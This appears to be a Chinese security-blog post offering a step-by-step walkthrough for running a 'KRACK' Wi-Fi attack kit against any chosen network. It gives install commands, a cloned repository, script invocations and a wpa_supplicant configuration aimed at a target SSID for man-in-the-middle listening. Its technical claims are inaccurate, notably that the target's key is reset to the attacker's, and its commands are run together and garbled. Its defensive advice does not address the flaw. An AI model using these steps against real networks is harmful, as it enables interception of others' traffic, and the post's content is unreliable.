國內研究人員首次Wifi重大漏洞利用實現 | Krack攻擊測試套件打包

彈出連接提示彈窗後，輸入任意密碼位數均可，嘗試連接，目標wifi會被攻擊，創造握手，目標wifi密鑰會被重置成你設定的密鑰，在iphone上可以看到有人不斷連接和斷開，這時候就是連接成功，可以開始監聽，利用中間人技術，這裡以iphone手機做測試。Krack曝出來很久了，所以在11.3號寫下這篇文章，思來想去就發表在freebuf這吧。

從事件開始到現在也一直沒有攻擊的套件和利用文章，按步驟操作，過程很簡單，研究人員都可以看懂，不提倡惡意攻擊者使用，所以就不寫傻瓜tou式教程lan，在絕大用戶都沒更新的時候，還是希望這篇文章只是作為研究使用

（漏洞沒有那麼大的傷害性）

打開終端：

apt-get update
apt-get install libnl-3-dev libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-scapy python-pycryptodome

下載文件：

git clone https://github.com/NoahhhRyan/krackattacks-testcd krackattacks-test-research  cd krackattackschmod 777 krack-ft-test.pychmod 777 disable-hwcrypto.sh./disable-hwcrypto.shpython krack-ft-test.py

設置network.conf文件,在目錄里需要將裡面的」testnet」改成你要攻擊的wifi名，密碼隨意，保存在套件目錄下：

最後執行如下命令，並嘗試連接目標開始攻擊，等待結果。

sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf

然後也可以對任意wifi進行攻擊，在wifi列表點擊連接即可，在蘋果手機上的熱點欄能看到攻擊者不斷連接和斷開，這裡我們再測試了一個wifi，效果同樣可以。

防禦方法

總結一下，提供一個暫時的解決辦法，更改路由器默認用戶名，密碼和SSID，打開防火牆，關閉SSID廣播，為自己的用戶設置單獨的SSID，完全關閉DHCP。

危害性

其實不用那麼擔心，咱們大天朝wifi萬能鑰匙都存在多少年了，比它牛逼多了，也沒見你們害怕啊。。

Thanks for all.
Weibo@NoahhhRyan.

*本文作者：NoahhhRyan，轉載請註明來自FreeBuf.COM

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！